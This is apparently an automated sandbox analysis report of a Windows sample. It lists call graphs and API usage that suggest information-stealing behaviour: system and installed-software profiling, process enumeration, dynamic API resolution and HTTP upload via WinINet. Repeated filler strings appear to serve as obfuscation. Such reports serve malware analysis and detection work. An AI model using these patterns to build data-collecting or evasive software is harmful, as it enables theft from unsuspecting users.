lstrcpy 15677->15678 15679 a715a3 15678->15679 15679->14552 15681 a747c6 15680->15681 15682 a74838 lstrlen 15681->15682 15706 a8aad0 15682->15706 15684 a74848 InternetCrackUrlA 15685 a74867 15684->15685 15685->14629 15687 a74eee 15686->15687 15688 a79af9 LocalAlloc 15686->15688 15687->14651 15687->14654 15688->15687 15689 a79b14 CryptStringToBinaryA 15688->15689 15689->15687 15690 a79b39 LocalFree 15689->15690 15690->15687 15692 a8a740 lstrcpy 15691->15692 15693 a88b74 15692->15693 15694 a8a740 lstrcpy 15693->15694 15695 a88b82 GetSystemTime 15694->15695 15697 a88b99 15695->15697 15696 a8a7a0 lstrcpy 15698 a88bfc 15696->15698 15697->15696 15698->14645 15701 a8a931 15699->15701 15700 a8a988 15702 a8a7a0 lstrcpy 15700->15702 15701->15700 15703 a8a968 lstrcpy lstrcat 15701->15703 15704 a8a994 15702->15704 15703->15700 15704->14648 15705->14763 15706->15684 15707->14773 15708->14914 15709->14916 15710->14924 15839 a877a0 15711->15839 15714 a81c1e 15714->15006 15715 a876c6 RegOpenKeyExA 15716 a87704 RegCloseKey 15715->15716 15717 a876e7 RegQueryValueExA 15715->15717 15716->15714 15717->15716 15719 a81c99 15718->15719 15719->15020 15721 a81e09 15720->15721 15721->15062 15723 a87a9a wsprintfA 15722->15723 15724 a81e84 15722->15724 15723->15724 15724->15076 15726 a87b4d 15725->15726 15727 a81efe 15725->15727 15846 a88d20 LocalAlloc CharToOemW 15726->15846 15727->15090 15730 a8a740 lstrcpy 15729->15730 15731 a87bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15730->15731 15738 a87c25 15731->15738 15732 a87d18 15734 a87d28 15732->15734 15735 a87d1e LocalFree 15732->15735 15733 a87c46 GetLocaleInfoA 15733->15738 15736 a8a7a0 lstrcpy 15734->15736 15735->15734 15740 a87d37 15736->15740 15737 a8a9b0 lstrcpy lstrlen lstrcpy lstrcat 15737->15738 15738->15732 15738->15733 15738->15737 15739 a8a8a0 lstrcpy 15738->15739 15739->15738 15740->15103 15742 a82008 15741->15742 15742->15118 15744 a89493 GetModuleFileNameExA CloseHandle 15743->15744 15745 a894b5 15743->15745 15744->15745 15746 a8a740 lstrcpy 15745->15746 15747 a82091 15746->15747 15747->15133 15749 a87e68 RegQueryValueExA 15748->15749 15750 a82119 15748->15750 15751 a87e8e RegCloseKey 15749->15751 15750->15147 15751->15750 15753 a87fb9 GetLogicalProcessorInformationEx 15752->15753 15754 a87fd8 GetLastError 15753->15754 15757 a88029 15753->15757 15761 a87fe3 15754->15761 15764 a88022 15754->15764 15758 a889f0 2 API calls 15757->15758 15760 a8807b 15758->15760 15759 a889f0 2 API calls 15762 a82194 15759->15762 15763 a88084 wsprintfA 15760->15763 15760->15764 15761->15753 15761->15762 15847 a889f0 15761->15847 15850 a88a10 GetProcessHeap RtlAllocateHeap 15761->15850 15762->15161 15763->15762 15764->15759 15764->15762 15766 a8220f 15765->15766 15766->15175 15768 a889b0 15767->15768 15769 a8814d GlobalMemoryStatusEx 15768->15769 15771 a88163 15769->15771 15770 a8819b wsprintfA 15772 a82289 15770->15772 15771->15770 15772->15189 15774 a887fb GetProcessHeap RtlAllocateHeap wsprintfA 15773->15774 15776 a8a740 lstrcpy 15774->15776 15777 a8230b 15776->15777 15777->15203 15779 a8a740 lstrcpy 15778->15779 15781 a88229 15779->15781 15780 a88263 15783 a8a7a0 lstrcpy 15780->15783 15781->15780 15782 a8a9b0 lstrcpy lstrlen lstrcpy lstrcat 15781->15782 15785 a8a8a0 lstrcpy 15781->15785 15782->15781 15784 a882dc 15783->15784 15784->15220 15785->15781 15787 a8a740 lstrcpy 15786->15787 15788 a8835c RegOpenKeyExA 15787->15788 15789 a883ae 15788->15789 15790 a883d0 15788->15790 15791 a8a7a0 lstrcpy 15789->15791 15792 a883f8 RegEnumKeyExA 15790->15792 15793 a88613 RegCloseKey 15790->15793 15804 a883bd 15791->15804 15794 a8860e 15792->15794 15795 a8843f wsprintfA RegOpenKeyExA 15792->15795 15796 a8a7a0 lstrcpy 15793->15796 15794->15793 15797 a884c1 RegQueryValueExA 15795->15797 15798 a88485 RegCloseKey RegCloseKey 15795->15798 15796->15804 15799 a884fa lstrlen 15797->15799 15800 a88601 RegCloseKey 15797->15800 15801 a8a7a0 lstrcpy 15798->15801 15799->15800 15802 a88510 15799->15802 15800->15794 15801->15804 15803 a8a9b0 4 API calls 15802->15803 15805 a88527 15803->15805 15804->15246 15806 a8a8a0 lstrcpy 15805->15806 15807 a88533 15806->15807 15808 a8a9b0 4 API calls 15807->15808 15809 a88557 15808->15809 15810 a8a8a0 lstrcpy 15809->15810 15811 a88563 15810->15811 15812 a8856e RegQueryValueExA 15811->15812 15812->15800 15813 a885a3 15812->15813 15814 a8a9b0 4 API calls 15813->15814 15815 a885ba 15814->15815 15816 a8a8a0 lstrcpy 15815->15816 15817 a885c6 15816->15817 15818 a8a9b0 4 API calls 15817->15818 15819 a885ea 15818->15819 15820 a8a8a0 lstrcpy 15819->15820 15821 a885f6 15820->15821 15821->15800 15823 a8a740 lstrcpy 15822->15823 15824 a886bc CreateToolhelp32Snapshot Process32First 15823->15824 15825 a886e8 Process32Next 15824->15825 15826 a8875d CloseHandle 15824->15826 15825->15826 15828 a886fd 15825->15828 15827 a8a7a0 lstrcpy 15826->15827 15829 a88776 15827->15829 15828->15825 15830 a8a9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15830 15831 a8a8a0 lstrcpy 15828->15831 15829->15278 15830->15828 15831->15828 15833 a8a7a0 lstrcpy 15832->15833 15834 a851b5 15833->15834 15835 a71590 lstrcpy 15834->15835 15836 a851c6 15835->15836 15851 a75100 15836->15851 15838 a851cf 15838->15290 15842 a87720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15839->15842 15841 a876b9 15841->15714 15841->15715 15843 a87780 RegCloseKey 15842->15843 15844 a87765 RegQueryValueExA 15842->15844 15845 a87793 15843->15845 15844->15843 15845->15841 15846->15727 15848 a889f9 GetProcessHeap HeapFree 15847->15848 15849 a88a0c 15847->15849 15848->15849 15849->15761 15850->15761 15852 a8a7a0 lstrcpy 15851->15852 15853 a75119 15852->15853 15854 a747b0 2 API calls 15853->15854 15855 a75125 15854->15855 16011 a88ea0 15855->16011 15857 a75184 15858 a75192 lstrlen 15857->15858 15859 a751a5 15858->15859 15860 a88ea0 4 API calls 15859->15860 15861 a751b6 15860->15861 15862 a8a740 lstrcpy 15861->15862 15863 a751c9 15862->15863 15864 a8a740 lstrcpy 15863->15864 15865 a751d6 15864->15865 15866 a8a740 lstrcpy 15865->15866 15867 a751e3 15866->15867 15868 a8a740 lstrcpy 15867->15868 15869 a751f0 15868->15869 15870 a8a740 lstrcpy 15869->15870 15871 a751fd InternetOpenA StrCmpCA 15870->15871 15872 a7522f 15871->15872 15873 a758c4 InternetCloseHandle 15872->15873 15874 a88b60 3 API calls 15872->15874 15880 a758d9 codecvt 15873->15880 15875 a7524e 15874->15875 15876 a8a920 3 API calls 15875->15876 15877 a75261 15876->15877 15878 a8a8a0 lstrcpy 15877->15878 15879 a7526a 15878->15879 15881 a8a9b0 4 API calls 15879->15881 15883 a8a7a0 lstrcpy 15880->15883 15882 a752ab 15881->15882 15884 a8a920 3 API calls 15882->15884 15892 a75913 15883->15892 15885 a752b2 15884->15885 15886 a8a9b0 4 API calls 15885->15886 15887 a752b9 15886->15887 15888 a8a8a0 lstrcpy 15887->15888 15889 a752c2 15888->15889 15890 a8a9b0 4 API calls 15889->15890 15891 a75303 15890->15891 15893 a8a920 3 API calls 15891->15893 15892->15838 15894 a7530a 15893->15894 15895 a8a8a0 lstrcpy 15894->15895 15896 a75313 15895->15896 15897 a75329 InternetConnectA 15896->15897 15897->15873 15898 a75359 HttpOpenRequestA 15897->15898 15900 a758b7 InternetCloseHandle 15898->15900 15901 a753b7 15898->15901 15900->15873 15902 a8a9b0 4 API calls 15901->15902 15903 a753cb 15902->15903 15904 a8a8a0 lstrcpy 15903->15904 15905 a753d4 15904->15905 15906 a8a920 3 API calls 15905->15906 15907 a753f2 15906->15907 15908 a8a8a0 lstrcpy 15907->15908 15909 a753fb 15908->15909 15910 a8a9b0 4 API calls 15909->15910 15911 a7541a 15910->15911 15912 a8a8a0 lstrcpy 15911->15912 15913 a75423 15912->15913 15914 a8a9b0 4 API calls 15913->15914 15915 a75444 15914->15915 15916 a8a8a0 lstrcpy 15915->15916 15917 a7544d 15916->15917 15918 a8a9b0 4 API calls 15917->15918 15919 a7546e 15918->15919 16012 a88ead CryptBinaryToStringA 16011->16012 16016 a88ea9 16011->16016 16013 a88ece GetProcessHeap RtlAllocateHeap 16012->16013 16012->16016 16014 a88ef4 codecvt 16013->16014 16013->16016 16015 a88f05 CryptBinaryToStringA 16014->16015 16015->16016 16016->15857 16020->15293 16263 a79880 16021->16263 16023 a798e1 16023->15300 16025 a8a740 lstrcpy 16024->16025 16198 a8a740 lstrcpy 16197->16198 16199 a80266 16198->16199 16200 a88de0 2 API calls 16199->16200 16201 a8027b 16200->16201 16202 a8a920 3 API calls 16201->16202 16203 a8028b 16202->16203 16204 a8a8a0 lstrcpy 16203->16204 16205 a80294 16204->16205 16206 a8a9b0 4 API calls 16205->16206 16264 a7988d 16263->16264 16267 a76fb0 16264->16267 16266 a798ad codecvt 16266->16023 16270 a76d40 16267->16270 16271 a76d63 16270->16271 16285 a76d59 16270->16285 16286 a76530 16271->16286 16275 a76dbe 16275->16285 16296 a769b0 16275->16296 16277 a76e2a 16278 a76ee6 VirtualFree 16277->16278 16280 a76ef7 16277->16280 16277->16285 16278->16280 16279 a76f41 16283 a889f0 2 API calls 16279->16283 16279->16285 16280->16279 16281 a76f26 FreeLibrary 16280->16281 16282 a76f38 16280->16282 16281->16280 16284 a889f0 2 API calls 16282->16284 16283->16285 16284->16279 16285->16266 16287 a76542 16286->16287 16289 a76549 16287->16289 16306 a88a10 GetProcessHeap RtlAllocateHeap 16287->16306 16289->16285 16290 a76660 16289->16290 16291 a7668f VirtualAlloc 16290->16291 16293 a7673c 16291->16293 16294 a76730 16291->16294 16293->16275 16294->16293 16295 a76743 VirtualAlloc 16294->16295 16295->16293 16297 a769c9 16296->16297 16301 a769d5 16296->16301 16298 a76a09 LoadLibraryA 16297->16298 16297->16301 16299 a76a32 16298->16299 16298->16301 16303 a76ae0 16299->16303 16307 a88a10 GetProcessHeap RtlAllocateHeap 16299->16307 16301->16277 16302 a76ba8 GetProcAddress 16302->16301 16302->16303 16303->16301 16303->16302 16304 a889f0 2 API calls 16304->16303 16305 a76a8b 16305->16301 16305->16304 16306->16289 16307->16305

                                  Executed Functions

                                  Function 00A89860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 a89860-a89874 call a89750 663 a8987a-a89a8e call a89780 GetProcAddress * 21 660->663 664 a89a93-a89af2 LoadLibraryA * 5 660->664 663->664 665 a89b0d-a89b14 664->665 666 a89af4-a89b08 GetProcAddress 664->666 668 a89b46-a89b4d 665->668 669 a89b16-a89b41 GetProcAddress * 2 665->669 666->665 671 a89b68-a89b6f 668->671 672 a89b4f-a89b63 GetProcAddress 668->672 669->668 673 a89b89-a89b90 671->673 674 a89b71-a89b84 GetProcAddress 671->674 672->671 675 a89bc1-a89bc2 673->675 676 a89b92-a89bbc GetProcAddress * 2 673->676 674->673 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(77190000,00681648), ref: 00A898A1
                                  • GetProcAddress.KERNEL32(77190000,00681618), ref: 00A898BA
                                  • GetProcAddress.KERNEL32(77190000,00681660), ref: 00A898D2
                                  • GetProcAddress.KERNEL32(77190000,006817B0), ref: 00A898EA
                                  • GetProcAddress.KERNEL32(77190000,006817E0), ref: 00A89903
                                  • GetProcAddress.KERNEL32(77190000,00688BF8), ref: 00A8991B
                                  • GetProcAddress.KERNEL32(77190000,006754A8), ref: 00A89933
                                  • GetProcAddress.KERNEL32(77190000,00675588), ref: 00A8994C
                                  • GetProcAddress.KERNEL32(77190000,00681678), ref: 00A89964
                                  • GetProcAddress.KERNEL32(77190000,00681690), ref: 00A8997C
                                  • GetProcAddress.KERNEL32(77190000,006816A8), ref: 00A89995
                                  • GetProcAddress.KERNEL32(77190000,006814F8), ref: 00A899AD
                                  • GetProcAddress.KERNEL32(77190000,00675688), ref: 00A899C5
                                  • GetProcAddress.KERNEL32(77190000,00681510), ref: 00A899DE
                                  • GetProcAddress.KERNEL32(77190000,00681528), ref: 00A899F6
                                  • GetProcAddress.KERNEL32(77190000,006755A8), ref: 00A89A0E
                                  • GetProcAddress.KERNEL32(77190000,00681540), ref: 00A89A27
                                  • GetProcAddress.KERNEL32(77190000,00681558), ref: 00A89A3F
                                  • GetProcAddress.KERNEL32(77190000,00675408), ref: 00A89A57
                                  • GetProcAddress.KERNEL32(77190000,00681858), ref: 00A89A70
                                  • GetProcAddress.KERNEL32(77190000,00675728), ref: 00A89A88
                                  • LoadLibraryA.KERNEL32(00681888,?,00A86A00), ref: 00A89A9A
                                  • LoadLibraryA.KERNEL32(00681840,?,00A86A00), ref: 00A89AAB
                                  • LoadLibraryA.KERNEL32(00681828,?,00A86A00), ref: 00A89ABD
                                  • LoadLibraryA.KERNEL32(00681870,?,00A86A00), ref: 00A89ACF
                                  • LoadLibraryA.KERNEL32(00681810,?,00A86A00), ref: 00A89AE0
                                  • GetProcAddress.KERNEL32(76850000,006818A0), ref: 00A89B02
                                  • GetProcAddress.KERNEL32(77040000,006818B8), ref: 00A89B23
                                  • GetProcAddress.KERNEL32(77040000,006817F8), ref: 00A89B3B
                                  • GetProcAddress.KERNEL32(75A10000,00688E88), ref: 00A89B5D
                                  • GetProcAddress.KERNEL32(75690000,006755C8), ref: 00A89B7E
                                  • GetProcAddress.KERNEL32(776F0000,00688C18), ref: 00A89B9F
                                  • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00A89BB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: (Wg$NtQueryInformationProcess
                                  • API String ID: 2238633743-613721733
                                  • Opcode ID: d54117406967a3d658e1754ec719a67322245bef4101eb9ec6b4957ad63ec957
                                  • Instruction ID: a1d28491bd065f3c6897343591019caaae22597e40c4b765b33a9e738e7c5a59
                                  • Opcode Fuzzy Hash: d54117406967a3d658e1754ec719a67322245bef4101eb9ec6b4957ad63ec957
                                  • Instruction Fuzzy Hash: 17A14CB5508240AFD354EFA8FD88B6E37F9F74C301F54471AE689D36A4DA3A9841CB12
                                  Function 00A745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 a745c0-a74695 RtlAllocateHeap 781 a746a0-a746a6 764->781 782 a7474f-a747a9 VirtualProtect 781->782 783 a746ac-a7474a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A7460E
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A7479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A746CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A745DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A745F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A746B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A746AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A745C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A745E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A746D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A746C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A7475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A745D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A74617
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 1ec63368ac90290df2651a419ecfb432a7f3223f3cc3d456fa92e8a319e767e3
                                  • Instruction ID: 2208ab4b215d7829a1ba45658ecc6d45c7bbef31fd69ca975d7465c8b1b000d8
                                  • Opcode Fuzzy Hash: 1ec63368ac90290df2651a419ecfb432a7f3223f3cc3d456fa92e8a319e767e3
                                  • Instruction Fuzzy Hash: 7B414629BC67047AEE3DBFB58843F9D77DB7F4674AF505840AC2412398CBB069806712
                                  Function 00A76280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1012 a76280-a7630b call a8a7a0 call a747b0 call a8a740 InternetOpenA StrCmpCA 1019 a76314-a76318 1012->1019 1020 a7630d 1012->1020 1021 a7631e-a76342 InternetConnectA 1019->1021 1022 a76509-a76525 call a8a7a0 call a8a800 * 2 1019->1022 1020->1019 1023 a764ff-a76503 InternetCloseHandle 1021->1023 1024 a76348-a7634c 1021->1024 1040 a76528-a7652d 1022->1040 1023->1022 1026 a7634e-a76358 1024->1026 1027 a7635a 1024->1027 1029 a76364-a76392 HttpOpenRequestA 1026->1029 1027->1029 1032 a764f5-a764f9 InternetCloseHandle 1029->1032 1033 a76398-a7639c 1029->1033 1032->1023 1035 a763c5-a76405 HttpSendRequestA HttpQueryInfoA 1033->1035 1036 a7639e-a763bf InternetSetOptionA 1033->1036 1038 a76407-a76427 call a8a740 call a8a800 * 2 1035->1038 1039 a7642c-a7644b call a88940 1035->1039 1036->1035 1038->1040 1045 a7644d-a76454 1039->1045 1046 a764c9-a764e9 call a8a740 call a8a800 * 2 1039->1046 1050 a764c7-a764ef InternetCloseHandle 1045->1050 1051 a76456-a76480 InternetReadFile 1045->1051 1046->1040 1050->1032 1055 a76482-a76489 1051->1055 1056 a7648b 1051->1056 1055->1056 1059 a7648d-a764c5 call a8a9b0 call a8a8a0 call a8a800 1055->1059 1056->1050 1059->1051
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
